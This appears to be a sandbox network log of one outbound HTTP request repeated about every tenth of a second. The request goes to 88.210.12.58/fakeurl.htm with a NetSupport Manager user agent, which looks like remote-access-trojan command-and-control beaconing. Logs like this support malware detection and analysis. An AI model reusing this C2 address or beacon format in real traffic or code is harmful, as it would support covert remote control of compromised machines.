Dec 10, 2024 08:59:32.867018938 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:32.968761921 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:33.068054914 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:33.168015957 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:33.269042015 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:33.370043039 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:33.470022917 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:33.572746038 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:33.671031952 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:33.771034002 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:33.872745991 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:33.973071098 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:34.074093103 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:34.175153971 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:34.276051044 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:34.376076937 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:34.476217031 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:34.577075005 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:34.677025080 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:34.777112007 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:34.877051115 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:34.980753899 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:35.078068018 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:35.179033995 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:35.279045105 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:35.384747982 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:35.484745026 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:35.581027985 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:35.681020975 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:35.781038046 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:35.883438110 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:35.982067108 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:36.083106995 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:36.184066057 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:36.285105944 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:36.385094881 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:36.486084938 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:36.586045980 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:36.686088085 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:36.787134886 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:36.887025118 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:36.988753080 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:37.089050055 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:37.190063000 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:37.290041924 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:37.391518116 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:37.496751070 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:37.592749119 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:37.708600044 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:37.816754103 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:38.032705069 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:38.246031046 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:38.347079992 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:38.447113037 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:38.648050070 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:38.749061108 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:38.849045992 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:38.952769995 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:39.051525116 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:39.156747103 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:39.252044916 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:39.356753111 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:39.453039885 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:39.556751966 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:39.656749964 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:39.756019115 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:39.860755920 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:39.957027912 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:40.057055950 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:40.158127069 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:40.259063005 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:40.360091925 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:40.478929996 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:41.095475912 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:41.196023941 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:41.297013044 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:41.398022890 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:41.498042107 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:41.599633932 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:41.700079918 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:41.803348064 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:41.904748917 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:42.003047943 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:42.104055882 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:42.205056906 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:42.306039095 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:42.407012939 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:42.507070065 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:42.608133078 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:42.709038973 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:42.809065104 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:42.909096003 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:59:43.009243965 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
